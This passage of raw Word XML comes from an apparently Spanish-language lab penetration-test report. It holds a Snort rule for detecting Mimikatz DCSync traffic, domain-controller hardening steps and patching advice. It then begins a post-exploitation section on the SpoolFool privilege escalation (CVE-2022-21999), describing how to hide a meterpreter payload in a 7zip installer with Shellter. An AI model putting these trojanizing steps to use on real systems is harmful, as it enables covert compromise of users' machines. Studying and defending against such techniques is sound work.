        </w:rPr>
        <w:t>9. Regla: `alert tcp $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; byte_test:1,&gt;=,0x10,4; byte_test:1,&lt;=,0x11,4; content:"|03 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000012; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C79B4B9" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5416E177" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta regla está diseñada para detectar solicitudes de cambio de nombre de contexto en el protocolo DRSUAPI relacionadas con Mimikatz. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD47E48" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFD40C9" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla se activa cuando se detecta tráfico TCP proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB3470" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI DsGetNCChanges Request".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707893A" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17283610" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Se realiza una prueba de byte para verificar si el primer byte después de la posición 4 es mayor o igual a `0x10` y menor o igual a `0x11` (`byte_test:1,&gt;=,0x10,4; byte_test:1,&lt;=,0x11,4`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEBBEE" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `03 00` 2 bytes después de la posición 22 (`content:"|03 00|"; offset:22; depth:2`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C9B89" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F97BD33" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B420C9F" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El identificador de la regla (`sid`) es 1000012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEAE0FD" w14:textId="77777777" w:rsidR="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3153BBF5" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223759DE" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041B4CB5" w14:textId="2580F2CF" w:rsidR="00C97A27" w:rsidRDefault="00146AEF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora iremos al panel del control de Internet Information Services (ISS), lo haremos en el controlador de dominio DC01.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70378FA4" w14:textId="77777777" w:rsidR="00146AEF" w:rsidRDefault="00146AEF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CFB24D" w14:textId="04DB9329" w:rsidR="00146AEF" w:rsidRDefault="00146AEF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y en el panel iremos a Autentificación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE68A4" w14:textId="77777777" w:rsidR="00146AEF" w:rsidRDefault="00146AEF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A97D419" w14:textId="63E48EEC" w:rsidR="00146AEF" w:rsidRDefault="00146AEF" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="524BCF98" wp14:editId="127432BA">
            <wp:extent cx="6645910" cy="5327650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="41339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1411" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5327650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="753F098D" w14:textId="77777777" w:rsidR="00C97A27" w:rsidRDefault="00C97A27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380961B5" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1869AC" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A708636" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569D042D" w14:textId="042EEB75" w:rsidR="00B72A79" w:rsidRDefault="00BB5969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="170BACE4" wp14:editId="19150BBC">
            <wp:extent cx="6645910" cy="5327650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="178315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00" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId210">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5327650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B3F97" w14:textId="77777777" w:rsidR="00BB5969" w:rsidRDefault="00BB5969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD6FBC1" w14:textId="059FAC83" w:rsidR="00BB5969" w:rsidRDefault="00BB5969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Eliminaremos NTLM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3421BEF6" w14:textId="77777777" w:rsidR="00BB5969" w:rsidRDefault="00BB5969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F8E41B" w14:textId="4A9464DE" w:rsidR="00BB5969" w:rsidRDefault="00BB5969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Y añadiré </w:t>
      </w:r>
      <w:r w:rsidR="00900F61">
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t>erberos que es un protocolo mucho más seguro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C7C191" w14:textId="77777777" w:rsidR="00B72A79" w:rsidRDefault="00B72A79" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5777EABD" w14:textId="1F17D089" w:rsidR="00C97A27" w:rsidRDefault="00BB5969" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Con esto conseguiremos impedir el ataque</w:t>
      </w:r>
      <w:r w:rsidR="00250157">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A59C1F" w14:textId="77777777" w:rsidR="00250157" w:rsidRDefault="00250157" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6374446A" w14:textId="3AFABED4" w:rsidR="00250157" w:rsidRDefault="00250157" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora activare el SSL, que </w:t>
      </w:r>
      <w:r w:rsidR="00900F61">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a lado de Autentificación en la ventana:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F3A84" w14:textId="77777777" w:rsidR="00250157" w:rsidRDefault="00250157" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23822350" w14:textId="4D071120" w:rsidR="00250157" w:rsidRDefault="00250157" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2328D35E" wp14:editId="70416F59">
            <wp:extent cx="5523809" cy="4638095"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1759375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5187" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId211">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5523809" cy="4638095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFA243F" w14:textId="77777777" w:rsidR="009628A4" w:rsidRDefault="009628A4" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D888F50" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="07C6FD72" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="228CE75A" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="57D1CDEC" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="6F4E2449" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="717D1E1F" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="691AE090" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="12878724" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="770D9116" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="08913E31" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="1F6CDE03" w14:textId="77777777" w:rsidR="004A7F36" w:rsidRDefault="004A7F36" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="5A382BFB" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="30DB4E7A" w14:textId="52BCE017" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc135575993"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Defensa General:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="03732C31" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="1457C04D" w14:textId="5443AD35" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC">
      <w:r>
        <w:t xml:space="preserve">Lo primero que hay que tener en </w:t>
      </w:r>
      <w:r w:rsidR="00386103">
        <w:t>cuenta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es que en análisis de vulnerabilidades realizado la mayoría de las vulnerabilidades se corregirían aplicando los parches de seguridad de Windows, pues corrigen muchísimas vulnerabilidades que se van encontrando en Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA5C12" w14:textId="1414BA93" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC">
      <w:r>
        <w:t>Usando equipos que no están actualizados es algo problemático pues son vulnerables a muchas técnicas diferentes, aparte de que son técnicas ya probadas y documentadas con lo cual casi cualquiera que tenga acceso a esa información puede realizar un ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A4692" w14:textId="161B62E8" w:rsidR="00FC4CAC" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC">
      <w:r>
        <w:t>Por lo tanto recomiendo la actualización de los sistemas y la aplicación de los parches de seguridad de Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151A73D7" w14:textId="42F40F9E" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC">
      <w:r>
        <w:t>Además de eso otra cosa importante es tener contraseñas robustas, una contraseña abc123. No sirve pues es muy fácilmente descubierta mediante fuerza bruta, si la contraseña del controlador de dominio fuera cuna contraseña segura mi ataque no tendría éxito pues no sería capaz de descubrirla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B66340" w14:textId="705099AC" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC">
      <w:r>
        <w:t>Por lo tanto recomiendo crear una política de contraseñas robustas para todos los usuario para así lograr una protección mucho mejor de los datos privados de la empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605EAA1B" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="564A5AE8" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="7B04AA32" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="220EA52A" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="4F9C19CB" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="2F7DC334" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="5AB2678F" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="10E9C02C" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="670C30BD" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="4F36D9CF" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="12D6C6E5" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="0E11F439" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="72E86EFC" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="66A02AC2" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="5CE1F6CB" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="30D69B05" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="5D405A4D" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="769505F9" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="507D70DE" w14:textId="77777777" w:rsidR="00C7176F" w:rsidRDefault="00C7176F" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="5A91BE48" w14:textId="77777777" w:rsidR="00FC4CAC" w:rsidRPr="00FC4CAC" w:rsidRDefault="00FC4CAC" w:rsidP="00FC4CAC"/>
    <w:p w14:paraId="2DA38AC5" w14:textId="36067499" w:rsidR="00F43790" w:rsidRDefault="00B10908" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc135575994"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00F43790">
        <w:t>Post-</w:t>
      </w:r>
      <w:r w:rsidR="002E18C0">
        <w:t>Explotación:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="75D20CEA" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5E9687" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc135575995"/>
      <w:r>
        <w:t>CVE-2022-21999 SpoolFool Privesc:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="13C19475" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790"/>
    <w:p w14:paraId="4EA66A06" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:r>
        <w:t>Windows Print Spooler tiene una vulnerabilidad de escalada de privilegios que se puede aprovechar para lograr la ejecución de código en el sistema. El SpoolDirectory, una opción de configuración que contiene la ruta a la que se envían los trabajos en la cola de una impresora, es editable para todos los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E3E45" w14:textId="4AD5FE77" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:r>
        <w:t>Este ataque ser realizará sobre la máquina de Windows 10</w:t>
      </w:r>
      <w:r w:rsidR="00A10482">
        <w:t>, con el usuario ‘usuario’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE7D1F5" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Al tener la cuenta del objetivo crearemos un paiload con msfvenom, para después explotar esta vulnerabilidad de escalada de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E6543" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612FC38F" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Crearé un paiload con Shellter que me permitirá iniciar una sesión de meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E277C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CED6E0E" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para eso iniciaré Shellter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA3D6CB" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37740892" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="412402E1" wp14:editId="1D8F4031">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="509393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3555" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId212"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9798A86" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C42D71" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Primero escogeremos la opción A:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F101E24" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58613FF7" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B9E5219" wp14:editId="23C048B3">
            <wp:extent cx="5400040" cy="2488565"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="152819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9088" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId213" cstate="screen">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25DFCE5C" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15FC5AEB" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>En el PE target elegiremos el instalador de 7zip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D38A564" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512DB3C3" w14:textId="02FEA094" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora en enable Stealth Mode, elegimos Y:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61560FC9" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA88AF4" w14:textId="77777777" w:rsidR="00F43790" w:rsidRDefault="00F43790" w:rsidP="00F43790">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
